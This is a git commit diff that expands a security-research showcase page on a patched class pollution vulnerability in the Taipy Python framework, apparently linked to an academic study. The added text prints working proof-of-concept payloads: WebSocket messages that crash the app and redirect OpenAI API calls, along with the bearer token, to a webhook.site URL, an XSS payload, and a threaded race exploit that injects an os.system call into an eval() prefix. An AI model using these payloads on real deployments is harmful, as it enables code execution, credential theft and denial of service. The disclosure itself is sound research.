docs: expand Taipy showcase with detailed vulnerability analysis

jackfromeast · jackfromeast · commit 7c5e82684f12 · 2026-05-19T20:24:38.000-04:00
Provide a comprehensive breakdown of the class pollution vulnerability in Taipy to better illustrate its impact and root cause. This update replaces high-level descriptions with specific exploitation scenarios, including remote code execution, denial of service, and sensitive data leakage. These details offer a clearer understanding of the risks associated with unvalidated attribute modification in dynamic state updates.
diff --git a/website/source/content/docs/collection/showcases/taipy.md b/website/source/content/docs/collection/showcases/taipy.md
@@ -16,9 +16,17 @@ weight: 3
 | Input | Remote (WebSocket) |
 | Status | Fixed |
 
+## Summary
+
+We identified a class pollution vulnerability in Taipy that allows attackers to overwrite the Taipy runtime context, leading to severe consequences including RCE, Reflected XSS, Denial of Service (DoS), and leakage of sensitive authorization credentials (e.g., OpenAI tokens).
+
 ## Vulnerability
 
-The vulnerability lies in `_attrsetter` in `taipy/gui/utils/_attributes.py`, which processes client update requests via WebSocket:
+The root cause lies in Taipy's use of a recursive set function to update variable values in Taipy states. Both the `name` and `value` parameters are derived from client-side input and lack proper validation. This allows an attacker to inject malicious input, such as `_TpN_tpec_TpExPr_value_TPMDL_2.__class__.__base__.set`, to overwrite the `set` method of `_TaipyBase`.
+
+The following functions are invoked in multiple routes via `_manage_message` to update states from the client side:
+
+[`taipy/gui/utils/_attributes.py`](https://github.com/Avaiga/taipy/blob/5c56f125a2bab02a260eee88503ee480ac933f7e/taipy/gui/utils/_attributes.py#L37-L42):
 
 ```python
 def _attrsetter(obj: object, attr_str: str, value: object) -> None:
@@ -29,63 +37,156 @@ def _attrsetter(obj: object, attr_str: str, value: object) -> None:
     setattr(obj, var_name_split[-1], value)  # Attr-Set only
 ```
 
-The function:
-1. Splits the attacker-controlled `attr_str` by dots
-2. Resolves each segment via `getattr` (Constrained-Get)
-3. Sets the final attribute with `setattr` (Attr-Set)
+[`taipy/gui/utils/_attributes.py`](https://github.com/Avaiga/taipy/blob/5c56f125a2bab02a260eee88503ee480ac933f7e/taipy/gui/utils/_attributes.py#L53-L58):
 
-No validation is performed on the attribute path.
+```python
+def _setscopeattr_drill(obj: object, attr_str: str, value: object) -> None:
+    var_name_split = attr_str.split(sep=".")
+    for i in range(len(var_name_split) - 1):
+        sub_name = var_name_split[i]
+        obj = getattr(obj, sub_name)
+    setattr(obj, var_name_split[-1], value)
+```
 
-## Detection by Pyrl
+The functions:
+1. Split the attacker-controlled `attr_str` by dots
+2. Resolve each segment via `getattr` (Constrained-Get)
+3. Set the final attribute with `setattr` (Attr-Set)
 
-Pyrl tracks the taint from WebSocket input:
+No validation is performed on the attribute path.
 
-1. `attr_str` and `value` parameters carry `T_INPUT`
-2. After `split(".")`, `var_name_split` is `T_ENUM`
-3. Loop iteration produces a `T_KEY` for each `sub_name`
-4. `getattr(obj, sub_name)` produces `T_OBJ` with `G_ATTR`
-5. Since only `getattr` is used (no item access branch), the program is **Constrained-Get**
-6. The `setattr` sink classifies the write as **Attr-Set**
+## PoC
 
-Classification: **Constrained-Get × Attr-Set**
+### Consequence 1: DoS
 
-## Exploitation
+<video controls width="100%">
+  <source src="https://drive.google.com/file/d/1BESvtyaJyEOp0BkeFdZFdwj83_E9wp18/preview" type="video/mp4">
+</video>
 
-### DoS
+**Steps:**
 
+1. Set up the tutorial case from the [Taipy Getting Started Guide](https://docs.taipy.io/en/latest/tutorials/getting_started/) at `http://localhost:5000`.
+2. Visit the page, intercept the WebSocket request, and replace the `name` field with `_TpN_tpec_TpExPr_value_TPMDL_2.__class__.__base__.set`. This overwrites the `set` method of `_TaipyBase` with a non-callable integer.
+
+```json
+["message",{"type":"U","name":"_TpN_tpec_TpExPr_value_TPMDL_2.__class__.__base__.set","payload":{"value":71,"on_change":"slider_moved"},"propagate":true,"client_id":"20250313210404484031-0.3099351422929606","ack_id":"Li_DKilnNL_N2AILnmFsD","module_context":"__main__"},null]
 ```
-attr_str: __class__.__getattribute__
-value: "crash"
-```
 
-### XSS
+3. Refresh the page and observe that dragging the slider causes the application to crash.
+
+**Effect**: `_TaipyBase.set` is overwritten with a non-callable integer. Any subsequent state update operation raises `TypeError`, making the application completely unusable for all users.
+
+---
+
+### Consequence 2: OpenAI Token Leakage
+
+**Steps:**
 
-Via the same BeautifulSoup entity map technique as django-unicorn:
+1. Set up the LLM ChatBot example from the [Taipy ChatBot Tutorial](https://docs.taipy.io/en/latest/tutorials/articles/chatbot/) at `http://localhost:5000`. The source code can be found [here](https://github.com/Avaiga/demo-chatbot).
+2. Visit the page, send a message (e.g., "hello"), and intercept the WebSocket request. Replace the `name` field with `client.base_url` and the `value` field with an attacker-controlled domain. This step may require multiple attempts to succeed.
+
+```json
+["message",{"type":"U","name":"client.base_url","payload":{"value":"https://webhook.site/0df4ac02-0b20-4ffc-bbda-287da8bc8a0a"},"propagate":true,"client_id":"20250315152148416630-0.5672333200699874","ack_id":"8OBXzCgeNv_DDW4MGpgnW","module_context":"__main__"},null]
 ```
-attr_str: __class__.__init__.__globals__.sys.modules.bs4.dammit.EntitySubstitution.CHARACTER_TO_XML_ENTITY.<
-value: <script>alert(1)</script>
+
+3. Send additional messages and observe that requests intended for OpenAI are redirected to the attacker's server, along with the associated OpenAI token.
+
+**Effect**: The attacker-controlled `base_url` causes all subsequent API calls (including the `Authorization: Bearer <token>` header) to be sent to the attacker's server, leaking the OpenAI API key.
+
+---
+
+### Consequence 3: XSS
+
+<img src="https://github.com/user-attachments/assets/0aae38bb-8f08-4850-93c0-ffd60d9006ee" alt="Taipy XSS via class pollution" width="100%">
+
+In [`taipy/gui/gui.py`](https://github.com/Avaiga/taipy/blob/439c7f52253fc09dd41c455a8a9f8da962d49dfa/taipy/gui/gui.py#L542-L546), when the application attempts to render user content, if the content provider is not found, it falls back to returning `type(content).__name__` as the HTML response:
+
+```python
+def _get_user_content_url(self, ...):
+    ...
+    if provider is None:
+        return type(content).__name__
 ```
 
-### RCE
+However, the `__name__` attribute of a class object is settable through class pollution, e.g., `tp_TpExPr_gui_get_adapted_lov_past_conversations_NoneType_TPMDL_2_0.__class__.__name__`. An attacker can overwrite this attribute with a malicious HTML or JavaScript payload.
+
+**Exploit:**
 
-Via environment variable pollution:
+```python
+pollute(
+    "tp_TpExPr_gui_get_adapted_lov_past_conversations_NoneType_TPMDL_2_0.__class__.__name__",
+    "<script>alert(document.domain)</script>"
+)
 ```
-attr_str: __class__.__init__.__globals__.sys.modules.os.environ.BROWSER
-value: /bin/sh -c 'reverse_shell_command'
+
+**Effect**: The attacker's script is injected into pages served to users who trigger the content rendering path.
+
+---
+
+### Consequence 4: RCE
+
+<img src="https://github.com/user-attachments/assets/6419bc85-2492-44f2-857e-a7f60158ae31" alt="Taipy RCE via class pollution" width="100%">
+
+The class pollution vulnerability allows attackers to set arbitrary attributes on objects that appear in the session state. We found that the `Gui.on_action` route can be leveraged to invoke the `Gui.table_on_edit` method, which allows new objects from the `__main__` module to be bound into the session state. In [`taipy/gui/gui.py`](https://github.com/Avaiga/taipy/blob/439c7f52253fc09dd41c455a8a9f8da962d49dfa/taipy/gui/gui.py#L1872), a `getattr` call on the state object automatically triggers the binding operation, while a subsequent `setattr` immediately resets the bound value to `None`:
+
+```python
+setattr(state, var_name, None)  # briefly binds the object before resetting
 ```
 
-### Token Leakage
+This behavior creates a brief race window where object references, such as the `Gui` class, temporarily exist in the session state. During this window, attackers can exploit class pollution to overwrite attributes on those objects.
+
+We further discovered that the `Gui.__SELF_VAR` attribute is used as a prefix when constructing expressions passed to Python's built-in `eval()` function in [`taipy/gui/utils/_evaluator.py`](https://github.com/Avaiga/taipy/blob/439c7f52253fc09dd41c455a8a9f8da962d49dfa/taipy/gui/utils/_evaluator.py#L265):
 
-Via disabling SSL verification or redirecting API calls:
+```python
+expr = f"{self.__SELF_VAR}.{expression}"
+eval(expr, ...)
 ```
-attr_str: __class__.__init__.__globals__.sys.modules.os.environ.REQUESTS_CA_BUNDLE
-value: /dev/null
+
+By overwriting the `__SELF_VAR` value through class pollution, an attacker can control the expression that gets evaluated, ultimately leading to arbitrary code execution on the server.
+
+**Exploit (race condition):**
+
+```python
+def run_race():
+    num_pollute = 300
+    barrier = threading.Barrier(num_pollute + 1)
+
+    threads = []
+    for i in range(num_pollute):
+        payload = "__import__('os').system('touch /tmp/pwned')"
+        t = threading.Thread(
+            target=pollute_race,
+            args=(f"Gui._Gui__SELF_VAR", payload)
+        )
+        threads.append(t)
+        t.start()
+
+    t_overwrite = threading.Thread(target=overwrite_race, args=("Gui",))
+    threads.append(t_overwrite)
+    t_overwrite.start()
+
+    barrier.wait()
 ```
 
+**Effect**: Arbitrary shell command execution as the Taipy server process user.
+
 ## Impact
 
-Taipy is used in production ML pipelines and data applications. The WebSocket endpoint is accessible to any authenticated user, making this a remote-triggerable vulnerability with severe consequences. Taipy Enterprise promptly patched the issue after responsible disclosure.
+Any user of Taipy can exploit this vulnerability to launch RCE, Reflected XSS, Denial of Service (DoS), and leakage of sensitive authorization credentials (e.g., OpenAI tokens). The WebSocket endpoint is accessible to any user, making this a remote-triggerable vulnerability. Taipy Enterprise promptly patched the issue after responsible disclosure.
 
 ## Proof of Concept
 
-See [`cp-collection/taipy/poc/`](https://github.com/jackfromeast/python-class-pollution/tree/main/cp-collection/taipy/poc) for the full exploit.
+[`cp-collection/taipy/poc/`](https://github.com/jackfromeast/python-class-pollution/tree/main/cp-collection/taipy/poc)
+&mdash; runnable exploit environment with `run.sh` and `requirements.txt`.
+
+Full exploit scripts:
+- [RCE exploit](https://gist.github.com/jackfromeast/df377c20520c101ab61111b8f6da6583#file-rce-py)
+- [XSS exploit](https://gist.github.com/jackfromeast/df377c20520c101ab61111b8f6da6583#file-xss-py)
+
+## References
+
+1. CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes. <https://cwe.mitre.org/data/definitions/915.html>
+2. Class Pollution leading to RCE in pydash. <https://gist.github.com/CalumHutton/45d33e9ea55bf4953b3b31c84703dfca>
+3. Prototype Pollution in Python. <https://blog.abdulrah33m.com/prototype-pollution-in-python/>
+4. Google Mesop fix (similar vulnerability). <https://github.com/google/mesop/pull/1171>
+5. Liu et al. *The First Large-Scale Systematic Study of Python Class Pollution Vulnerability*. IEEE S&P 2025. <https://jackfromeast.github.io/assets/Pyrl.pdf>